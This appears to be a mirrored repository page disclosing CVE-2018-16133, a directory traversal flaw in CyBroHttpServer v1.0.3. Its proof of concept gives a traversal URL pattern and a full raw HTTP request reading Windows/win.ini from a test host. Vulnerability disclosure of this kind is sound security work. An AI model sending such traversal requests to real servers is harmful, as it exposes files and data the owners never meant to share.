python>> CyBroHttpServer-v1.0.3-Directory-Traversal>> 返回
项目作者: EmreOvunc

项目描述 :
Directory Traversal in CyBroHttpServer v1.0.3 allows an attacker to read sensitive informations.
高级语言:
项目地址: git://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversal.git


CyBroHttpServer-v1.0.3-Directory-Traversal

Directory Traversal in CyBroHttpServer v1.0.3 allows an attacker to read sensitive informations.

CVE-2018-16133

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16133

PoC

To exploit vulnerability, someone could use ‘http://[host]/../../../../../../../../‘ request to get some informations from the target.
For example: http://[host]/../../../../../../../../Windows/win.ini

  1. GET /../../../../Windows/win.ini HTTP/1.1
  2. Host: 192.168.43.102:8080
  3. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  5. Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
  6. Accept-Encoding: gzip, deflate
  7. DNT: 1
  8. Connection: close
  9. Upgrade-Insecure-Requests: 1

alt tag

alt tag